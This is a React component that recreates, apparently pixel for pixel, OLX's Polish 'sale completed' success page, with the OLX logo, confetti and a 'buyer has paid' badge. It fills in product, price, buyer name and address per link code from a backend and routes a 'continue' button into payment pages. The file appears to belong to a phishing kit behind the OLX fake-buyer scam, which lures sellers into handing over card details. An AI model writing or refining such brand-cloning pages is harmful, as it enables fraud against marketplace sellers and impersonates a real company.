import React, { useState, useEffect } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './OlxSuccess.css';
import SupportWidget from './SupportWidget';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { getOlxTranslations } from '../olxTranslations';

import { API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

/* Konfetti 1:1 — prostokąty w kolorach #4DD44F #346CCB #D43B4D #9934CB #34CBBF #F0F0F0, część na wierzchu tekstu */
const OLX_CONFETTI = [
  { color: '#4DD44F', left: 12, top: 18, rotate: -12, w: 8, h: 5 },
  { color: '#346CCB', left: 18, top: 72, rotate: 8 },
  { color: '#D43B4D', left: 22, top: 35, rotate: 5 },
  { color: '#9934CB', left: 28, top: 48, rotate: -8, front: true },
  { color: '#34CBBF', left: 32, top: 22, rotate: 15 },
  { color: '#F0F0F0', left: 36, top: 68, rotate: -5 },
  { color: '#4DD44F', left: 42, top: 38, rotate: 10, front: true },
  { color: '#346CCB', left: 48, top: 58, rotate: -18 },
  { color: '#D43B4D', left: 52, top: 25, rotate: 6 },
  { color: '#9934CB', left: 55, top: 75, rotate: 12 },
  { color: '#34CBBF', left: 62, top: 42, rotate: -10, front: true },
  { color: '#4DD44F', left: 68, top: 28, rotate: 8, front: true },
  { color: '#F0F0F0', left: 72, top: 62, rotate: -14 },
  { color: '#346CCB', left: 78, top: 35, rotate: 4 },
  { color: '#D43B4D', left: 82, top: 52, rotate: -6 },
  { color: '#34CBBF', left: 88, top: 18, rotate: 9 },
  { color: '#4DD44F', left: 15, top: 55, rotate: 3 },
  { color: '#9934CB', left: 65, top: 68, rotate: -7 },
  { color: '#F0F0F0', left: 38, top: 78, rotate: 11 },
  { color: '#D43B4D', left: 58, top: 15, rotate: -9 },
  { color: '#346CCB', left: 75, top: 48, rotate: 2, front: true },
  { color: '#F0F0F0', left: 45, top: 32, rotate: -4 },
  { color: '#9934CB', left: 52, top: 65, rotate: 14 },
];

/**
 * OLX — страница успеха «Gratulujemy sprzedaży!» 1:1 по скрину.
 * Тёмный хедер, жёлтый баннер, две белые карточки (доставка + детали заказа).
 */
function OlxSuccess() {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(true);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  /* log/transition только на index2 (Olx2), не на success */

  useEffect(() => {
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) {
          const p = data.page;
          setPageData(p);
          if (p.country_code && pageCode) sessionStorage.setItem('page_country_' + pageCode, p.country_code);
        }
        setLoading(false);
      })
      .catch(() => setLoading(false));
  }, [pageCode]);

  const countryCode = pageData?.country_code || (pageCode ? sessionStorage.getItem('page_country_' + pageCode) : null) || 'PL';
  const t = getOlxTranslations(countryCode);
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const productPrice = pageData?.price != null ? Number(pageData.price) : 228;
  const symbol = getSymbol(primaryCurrency);
  const productName = pageData?.product_name || '';
  const photoUrl = pageData?.photo_url || '';
  const firstName = pageData?.first_name || '';
  const lastName = pageData?.last_name || '';
  const buyerName = [firstName, lastName].filter(Boolean).join(' ') || '—';
  const deliveryAddress = pageData?.delivery_address || t.deliveryAddressPlaceholder || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="olx-success-wrap">
        <div className="olx-success-loading">{t.loading}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="olx-success-wrap">
      <header className="olx-header">
        <div className="olx-header-inner">
          <a href="#/" className="olx-logo" aria-label="OLX">
            <img src={(process.env.PUBLIC_URL || '') + '/olx-logo.png'} alt="OLX" className="olx-logo-img" />
          </a>
          <nav className="olx-nav">
            <a href="#/" className="olx-nav-link">
              <OlxIconMessage />
              <span>{t.messages}</span>
            </a>
            <a href="#/" className="olx-nav-icon" aria-label="Favorites">
              <OlxIconHeart />
            </a>
            <a href="#/" className="olx-nav-link">
              <OlxIconPerson />
              <span>{t.yourAccount}</span>
            </a>
            <a href="#/" className="olx-btn-add">{t.addListing}</a>
          </nav>
        </div>
      </header>

      <div className="olx-banner">
        <span className="olx-confetti" aria-hidden>
          {OLX_CONFETTI.map((p, i) => (
            <span
              key={i}
              className={`olx-confetti-piece ${p.front ? 'olx-confetti-piece--front' : ''}`}
                style={{
                  left: `${p.left}%`,
                  top: `${p.top}%`,
                  transform: `translate(-50%, -50%) rotate(${p.rotate}deg)`,
                  backgroundColor: p.color,
                  width: (p.w || 8) + 'px',
                  height: (p.h || 6) + 'px',
                }}
            />
          ))}
        </span>
        <span className="olx-banner-text">{t.congratsBanner}</span>
      </div>

      <main className="olx-main">
        <div className="olx-cards">
          <div className="olx-card olx-card-delivery">
            <div className="olx-card-delivery-header">
              <h2 className="olx-card-title">{t.deliveryInfo}</h2>
              <img src={(process.env.PUBLIC_URL || '') + '/olx-truck-icon.png'} alt="" className="olx-card-truck-icon" aria-hidden />
            </div>
            <div className="olx-field">
              <label><OlxIconPerson className="olx-field-icon" /> {t.buyerNameLabel}</label>
              <div className="olx-input olx-input-readonly">{buyerName}</div>
            </div>
            <div className="olx-field">
              <label><OlxIconTruck className="olx-field-icon" /> {t.deliveryAddressLabel}</label>
              <div className="olx-input olx-input-readonly">{deliveryAddress}</div>
            </div>
            <div className="olx-info-box">
              <span className="olx-info-icon" aria-hidden>i</span>
              <p>{t.infoBoxText}</p>
            </div>
            <Link to={index2Path} className="olx-btn-wrap">
              <button type="button" className="olx-btn-continue">{t.continueBtn}</button>
            </Link>
          </div>

          <div className="olx-card olx-card-order">
            <h2 className="olx-card-title">{t.orderDetails}</h2>
            <div className="olx-product">
              {photoUrl ? (
                <img src={photoUrl} alt="" className="olx-product-img" />
              ) : (
                <div className="olx-product-placeholder" aria-hidden>
                  <span>📦</span>
                </div>
              )}
              <div className="olx-product-info">
                <span className="olx-product-name">{productName || '—'}</span>
                <p className="olx-product-price">
                  {productPrice} {symbol} {t.productPriceDelivery}
                </p>
              </div>
            </div>
            <div className="olx-paid-badge">
              <span className="olx-paid-check" aria-hidden>✓</span>
              <span>{t.buyerPaidStatus}</span>
            </div>
          </div>
        </div>
      </main>
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

/* Ikonki 1:1 OLX: bańka czatu ze „ogonkiem”, serce outline, osoba outline */
function OlxIconMessage() {
  return (
    <svg className="olx-nav-icon-svg" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <path d="M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z" />
    </svg>
  );
}
function OlxIconHeart() {
  return (
    <svg className="olx-nav-icon-svg" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <path d="M20.84 4.61a5.5 5.5 0 0 0-7.78 0L12 5.67l-1.06-1.06a5.5 5.5 0 0 0-7.78 7.78l1.06 1.06L12 21.23l7.78-7.78 1.06-1.06a5.5 5.5 0 0 0 0-7.78z" />
    </svg>
  );
}
function OlxIconPerson() {
  return (
    <svg className="olx-nav-icon-svg" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2" />
      <circle cx="12" cy="7" r="4" />
    </svg>
  );
}
function OlxIconTruck() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <rect x="1" y="3" width="15" height="13" />
      <polygon points="16 8 20 8 23 11 23 16 16 16 16 8" />
      <circle cx="5.5" cy="18.5" r="2.5" />
      <circle cx="18.5" cy="18.5" r="2.5" />
    </svg>
  );
}

export default OlxSuccess;
